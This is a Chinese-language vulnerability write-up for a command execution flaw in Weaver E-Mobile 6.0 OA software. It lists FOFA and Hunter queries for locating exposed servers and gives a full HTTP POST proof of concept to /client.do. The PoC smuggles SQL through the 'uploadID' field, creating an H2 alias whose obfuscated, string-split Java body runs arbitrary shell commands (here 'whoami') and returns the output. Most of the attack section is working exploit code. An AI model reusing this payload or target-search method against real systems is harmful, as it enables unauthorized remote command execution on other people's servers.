泛微E-Mobile 6.0 命令执行漏洞
漏洞描述
泛微E-Mobile 6.0 存在命令执行漏洞(注:影响版本不确定,如下图6.6版本的也成功了)
版本信息:E-Mobile 6.0
漏洞复现
fofa语法:fofa:app="泛微-EMobile"
hunter:app.name="泛微 e-mobile OA"
登录页面如下:
POC:
POST /client.do HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Length: 1125
------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="method"
getupload
------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="uploadID"
1';CREATE ALIAS if not exists abcd AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL abcd('whoami');--
------WebKitFormBoundaryvVPZWWKFq310ISXS--